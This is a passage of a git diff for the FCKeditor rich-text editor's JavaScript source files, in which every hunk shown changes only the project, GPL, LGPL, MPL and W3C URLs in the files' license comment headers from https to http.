http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckspecialcombo.js b/admin/FCKeditor/editor/_source/classes/fckspecialcombo.js index f34fdb9..7b2b2ea 100755 --- a/admin/FCKeditor/editor/_source/classes/fckspecialcombo.js +++ b/admin/FCKeditor/editor/_source/classes/fckspecialcombo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckstyledef.js b/admin/FCKeditor/editor/_source/classes/fckstyledef.js index 14b2c00..f1e7304 100755 --- a/admin/FCKeditor/editor/_source/classes/fckstyledef.js +++ b/admin/FCKeditor/editor/_source/classes/fckstyledef.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckstyledef_gecko.js b/admin/FCKeditor/editor/_source/classes/fckstyledef_gecko.js index fb65926..5f2b03b 100755 --- a/admin/FCKeditor/editor/_source/classes/fckstyledef_gecko.js +++ b/admin/FCKeditor/editor/_source/classes/fckstyledef_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckstyledef_ie.js b/admin/FCKeditor/editor/_source/classes/fckstyledef_ie.js index 2b362bf..bcddeb2 100755 --- a/admin/FCKeditor/editor/_source/classes/fckstyledef_ie.js +++ b/admin/FCKeditor/editor/_source/classes/fckstyledef_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckstylesloader.js b/admin/FCKeditor/editor/_source/classes/fckstylesloader.js index c7fb901..74b4a96 100755 --- a/admin/FCKeditor/editor/_source/classes/fckstylesloader.js +++ b/admin/FCKeditor/editor/_source/classes/fckstylesloader.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbar.js b/admin/FCKeditor/editor/_source/classes/fcktoolbar.js index 5a9d89a..50e45c4 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbar.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbar.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_gecko.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_gecko.js index 374618e..87c97dc 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_gecko.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_ie.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_ie.js index b7ca22f..2d9df63 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_ie.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarbreak_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarbutton.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarbutton.js index 2b528d4..1372738 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarbutton.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarbutton.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarbuttonui.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarbuttonui.js index 689f3b6..1db2dee 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarbuttonui.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarbuttonui.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarfontformatcombo.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarfontformatcombo.js index f35ab83..75e7ebf 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarfontformatcombo.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarfontformatcombo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarfontscombo.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarfontscombo.js index ed01b7f..d17e989 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarfontscombo.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarfontscombo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarfontsizecombo.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarfontsizecombo.js index a89572e..d734331 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarfontsizecombo.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarfontsizecombo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarpanelbutton.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarpanelbutton.js index 496bd9e..308fd77 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarpanelbutton.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarpanelbutton.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarspecialcombo.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarspecialcombo.js index 4739f32..d8e8f3b 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarspecialcombo.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarspecialcombo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fcktoolbarstylecombo.js b/admin/FCKeditor/editor/_source/classes/fcktoolbarstylecombo.js index 6a7ec61..27dfc48 100755 --- a/admin/FCKeditor/editor/_source/classes/fcktoolbarstylecombo.js +++ b/admin/FCKeditor/editor/_source/classes/fcktoolbarstylecombo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckw3crange.js b/admin/FCKeditor/editor/_source/classes/fckw3crange.js index 9a09525..7cde7e6 100755 --- a/admin/FCKeditor/editor/_source/classes/fckw3crange.js +++ b/admin/FCKeditor/editor/_source/classes/fckw3crange.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,19 +8,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This class partially implements the W3C DOM Range for browser that don't * support the standards (like IE): - * https://www.w3.org/TR/DOM-Level-2-Traversal-Range/ranges.html + * http://www.w3.org/TR/DOM-Level-2-Traversal-Range/ranges.html */ var FCKW3CRange = function( parentDocument ) diff --git a/admin/FCKeditor/editor/_source/classes/fckxml_gecko.js b/admin/FCKeditor/editor/_source/classes/fckxml_gecko.js index 66f650e..6ff03b6 100755 --- a/admin/FCKeditor/editor/_source/classes/fckxml_gecko.js +++ b/admin/FCKeditor/editor/_source/classes/fckxml_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckxml_ie.js b/admin/FCKeditor/editor/_source/classes/fckxml_ie.js index 028b50f..31e91d9 100755 --- a/admin/FCKeditor/editor/_source/classes/fckxml_ie.js +++ b/admin/FCKeditor/editor/_source/classes/fckxml_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fck_othercommands.js b/admin/FCKeditor/editor/_source/commandclasses/fck_othercommands.js index bc7f697..de3750b 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fck_othercommands.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fck_othercommands.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fckfitwindow.js b/admin/FCKeditor/editor/_source/commandclasses/fckfitwindow.js index 9079347..ef39712 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fckfitwindow.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fckfitwindow.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fcknamedcommand.js b/admin/FCKeditor/editor/_source/commandclasses/fcknamedcommand.js index 3d30f43..7ce996e 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fcknamedcommand.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fcknamedcommand.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fckpasteplaintextcommand.js b/admin/FCKeditor/editor/_source/commandclasses/fckpasteplaintextcommand.js index 9774971..d05bbc7 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fckpasteplaintextcommand.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fckpasteplaintextcommand.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fckpastewordcommand.js b/admin/FCKeditor/editor/_source/commandclasses/fckpastewordcommand.js index d6445a5..eb22cc9 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fckpastewordcommand.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fckpastewordcommand.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_gecko.js b/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_gecko.js index d3c4958..0b60ef3 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_gecko.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_ie.js b/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_ie.js index 99136f3..30e5526 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_ie.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fckspellcheckcommand_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fckstylecommand.js b/admin/FCKeditor/editor/_source/commandclasses/fckstylecommand.js index 4a5d9a2..d976367 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fckstylecommand.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fckstylecommand.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fcktablecommand.js b/admin/FCKeditor/editor/_source/commandclasses/fcktablecommand.js index e890dc7..4d77098 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fcktablecommand.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fcktablecommand.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser 